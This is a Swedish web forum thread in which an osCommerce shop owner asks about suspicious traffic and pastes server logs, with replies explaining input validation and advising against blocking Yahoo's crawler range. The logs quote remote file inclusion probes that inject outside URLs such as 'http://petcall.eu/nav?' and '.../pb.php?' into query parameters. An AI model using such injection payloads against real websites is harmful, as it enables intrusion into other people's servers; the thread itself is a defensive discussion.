webForumDet fria alternativet

Någon försöker hacka/förstöra min site

Webbutveckling

8 svar · 1 014 visningar · startad av Nova

Medlem sedan feb. 2005216 inlägg
Frågan#1

Någon/t försöker att göra någon typ av injekt på min site. Det byter Ip hela tiden under samma session? men när ipet beter sig som en normal sökrobbot så kommer ipet från detta.
OrgName: Inktomi Corporation
OrgID: INKT
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

NetRange: 74.6.0.0 - 74.6.255.255
CIDR: 74.6.0.0/16
NetName: INKTOMI-BLK-6
NetHandle: NET-74-6-0-0-1
Parent: NET-74-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.YAHOO.COM
NameServer: NS2.YAHOO.COM
NameServer: NS3.YAHOO.COM
NameServer: NS4.YAHOO.COM
NameServer: NS5.YAHOO.COM
Comment:
RegDate: 2006-02-13
Updated: 2007-03-09

RAbuseHandle: NETWO857-ARIN
RAbuseName: Network Abuse
RAbusePhone: +1-408-349-3300
RAbuseEmail: network-abuse@cc.yahoo-inc.com

Är det någon som anväder sig av Yahoo?
Jag tänkte blocka NetRange: 74.6.0.0 - 74.6.255.255 men är det Yahoo så känns det inte som en bra lösning. Vi får en del besökare där i från.

Så här ser har det sett ut i kväll.

74.6.25.32
68.59.212.229 16:49:15 /index.php?manufacturers_id=http://0x0134.lan.io/pb.php?
61.213.96.39 18:21:17 18:50:06/index.php?manufacturers_id=http://www.usa-gymnastics.org/nav?
195.101.51.11 18:21:17 19:47:27 /index.php?manufacturers_id=http://www.usa-gymnastics.org/nav?
74.6.24.35
208.100.17.65 18:21:17 19:54:04 /index.php?manufacturers_id=http://petcall.eu/nav?
192.89.129.162 18:21:17 19:56:42 /index.php?manufacturers_id=http://petcall.eu/nav?
194.210.29.49 18:21:17 20:02:32 /index.php?manufacturers_id=http://petcall.eu/nav?
74.6.19.206
66.249.72.193 18:21:17 20:05:43 /advanced_search_result.php?search_in_description=1&keywords=formar&page=1&sort=3a
202.76.75.100 18:21:17 20:09:55 /index.php?manufacturers_id=http://petcall.eu/nav?

Medlem sedan feb. 200112 078 inlägg
#2

Nova skrev:

Någon/t försöker att göra någon typ av injekt på min site. Det byter Ip hela tiden under samma session? men när ipet beter sig som en normal sökrobbot så kommer ipet från detta.

[..]

Är det någon som anväder sig av Yahoo?
Jag tänkte blocka NetRange: 74.6.0.0 - 74.6.255.255 men är det Yahoo så känns det inte som en bra lösning. Vi får en del besökare där i från.

Inktomi är en mjukvara som används i Yahoo!'s sökmotor, hence kan man antagligen förutsätta att just detta är en bot. Att spärra hela Yahoo!'s adressutrymme är däremot inte den bästa lösningen, eftersom dess sökmotor då kommer utesluta dig, samt att det i allmänhet anses ganska.. korkat att göra så, eftersom man inte vet vem man stänger ute.

Så här ser har det sett ut i kväll.

74.6.25.32
68.59.212.229 16:49:15 /index.php?manufacturers_id=http://0x0134.lan.io/pb.php?
61.213.96.39 18:21:17 18:50:06/index.php?manufacturers_id=http://www.usa-gymnastics.org/nav?
195.101.51.11 18:21:17 19:47:27 /index.php?manufacturers_id=http://www.usa-gymnastics.org/nav?
74.6.24.35
208.100.17.65 18:21:17 19:54:04 /index.php?manufacturers_id=http://petcall.eu/nav?
192.89.129.162 18:21:17 19:56:42 /index.php?manufacturers_id=http://petcall.eu/nav?
194.210.29.49 18:21:17 20:02:32 /index.php?manufacturers_id=http://petcall.eu/nav?
74.6.19.206
66.249.72.193 18:21:17 20:05:43 /advanced_search_result.php?search_in_description=1&keywords=formar&page=1&sort=3a
202.76.75.100 18:21:17 20:09:55 /index.php?manufacturers_id=http://petcall.eu/nav?

Ja, någon försöker uppenbarligen skjuta in URL'er i dina querystrings och hoppas antagligen att de ska köras. Det borde inte vara något problem om du väl validerar din indata, vilket är grunden till förebyggande mot SQL-injections.

Använder du ASP ser det till exempel ut såhär;

iMittId = CLng( Request("MittId") )

. Då kan de köra in hur mycket icke-talvärden de vill, det kommer ändå bara generera fel och avbryta exekveringen av sidan. Och sedan ska man givetvis inte skicka t.ex. redirect-URL'er i querystring/form, och validera all annan sträng-indata med t.ex. replace på ' (apostrof), bland annat.

Alltså; man spärrar inte IP-adressutrymmen, man ser till att säkra sin applikation. SQL-injections har diskuterats i ända på wF.

SQL-injections på t.ex. Google
http://www.google.se/search?hl=sv&q=sql+injections

En klassiker, den bästa av dem alla, på wF
http://www.webforum.nu/showthread.php?t=120902

Medlem sedan feb. 2005216 inlägg
#3

Just den sidan är en .php och den är uppbyggd så här.

if (isset($HTTP_GET_VARS['manufacturers_id'])) {  
        $category_query = tep_db_query("select manufacturers_name from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'");
        $category = tep_db_fetch_array($category_query);
Medlem sedan feb. 200112 078 inlägg
#4

Nova skrev:

Just den sidan är en .php och den är uppbyggd så här.

if (isset($HTTP_GET_VARS['manufacturers_id'])) {  
        $category_query = tep_db_query("select manufacturers_name from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'");
        $category = tep_db_fetch_array($category_query);

Ja, det är ju nästan exakt samma sak som det jag skrev, fast i PHP. Sålänge "manufacturers_id" är en sträng, så kommer ju det där att smälla, vilket är bra.

Har de lyckats med något än då, eller reagerar du bara över att de försöker?

Medlem sedan feb. 2005216 inlägg
#5

Nej de har inte lyckas med något ännu, vad jag kunnat se och märka. Men det känns lite olustigt att någon försöker att göra något.

Medlem sedan feb. 200112 078 inlägg
#6

Nova skrev:

Nej de har inte lyckas med något ännu, vad jag kunnat se och märka. Men det känns lite olustigt att någon försöker att göra något.

Ja, det känns olustigt när folk portscannar min brandvägg, skickar erbjudanden via e-post om penisförlängningar och hammrar på min IIS också, men det får man liksom räkna med på Internet idag. ;)

Medlem sedan feb. 2005216 inlägg
#7

JA de är ju tyvärr sant!

Tack för hjälpen :)

Medlem sedan jan. 20013 inlägg
#8

he he, jag upptäckte precis samma sak idag när jag kollade genom statistiken för sidan:

[84.108.162.0 - Indeterminable - 9/24 9:10]
/index.php?option=http://amygirl.webs.io/pb.php?
[64.231.1.206 - Indeterminable - 9/24 9:07]
/index.php?option=http://amygirl.webs.io/pb.php?
[69.157.179.15 - Indeterminable - 9/24 7:11]
/index.php?option=http://x0.741.com/pb.txt?
[69.156.101.137 - Indeterminable - 9/24 7:08]
/index.php?option=http://amygirl.webs.io/pb.php?
[69.157.179.15 - Indeterminable - 9/24 7:01]
/index.php?option=http://x0.741.com/pb.txt?
[69.156.166.52 - Indeterminable - 9/24 5:53]
/index.php?option=http://0xg3458.hub.io/pb.php?

osv, eftersom koden som du hade postat verkar tillhöra Virtuemart antar jag att du med kör med Joomla, kan vara någon gammal bug som dom har fixat till på sistone... bara trist att det ska fylla statistiken!

Medlem sedan feb. 2005216 inlägg
#9

Det är en Oscommerce butik.

255 ms totalt · 4 externa anrop · v20260731065814-full.6fe65c25
123 ms — deklarationer (db)
0 ms — hämta statistik (cache)
129 ms — hämta tråd, inlägg och bilagor (db)
119 ms — ändringar (db)